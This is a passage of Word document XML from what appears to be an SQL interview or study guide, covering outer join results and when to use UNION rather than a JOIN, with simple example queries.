      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE86AD7" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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A       B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5775E7" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0552D073" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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1       1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551381BA" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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2       2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68648E04" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>3       NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A91A4C" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Result includes all rows from Table A and matched rows from Table B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1662D690" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D77496" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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A       B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A04768" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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     ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E01B01" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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1       1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1578AE03" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2       2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B868DA" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>NULL    3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B6324" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="404"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Result includes all rows from Table B and matched rows from Table A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F7407D" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C2BAE4" w14:textId="7C71D758" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="127" w:name="_Toc178383310"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When would you use UNION instead of a join?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="760918DC" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">You would use </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you want to combine the results of two or more SQL queries that return data from similar columns but from different tables or queries, rather than relating the data based on a key between the tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B985F" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Differences Between UNION and JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E15672" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BE1667" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Combines the results of two or more SELECT queries into a single result set. The queries must have the same number of columns, with matching data types, in the same order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176E2FBB" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Combines rows from two or more tables based on a related column between them, merging columns from these tables into a single result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929E941" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When to Use UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E66387" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need to merge the result sets of multiple SELECT queries into a single result, but the data isn't related by any key. For example, if you have separate tables for employees and contractors but want a combined list of all individuals' names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C850C7B" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B788A2" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SELECT name, email FROM employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301AB28" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5210048F" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SELECT name, email FROM contractors;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BB26C" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The above query combines all unique names and emails from both the employees and contractors tables into a single list. Here, the rows aren’t joined based on any key but rather concatenated as one list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4948B638" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>When to Use JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05836C25" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you want to combine rows from two or more tables based on a related column between them. For example, retrieving employee data along with their department names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD88D34" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DCABAB" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SELECT employees.name, departments.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B27B97" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>FROM employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313C19BC" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>INNER JOIN departments ON employees.department_id = departments.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B41EE1" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="405"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This query returns combined rows from employees and departments, linking them based on a matching department_id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1198EC" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>UNION Variants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442460E3" w14:textId="77777777" w:rsidR="00D6081E" w:rsidRPr="00DA2F32" w:rsidRDefault="00D6081E" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
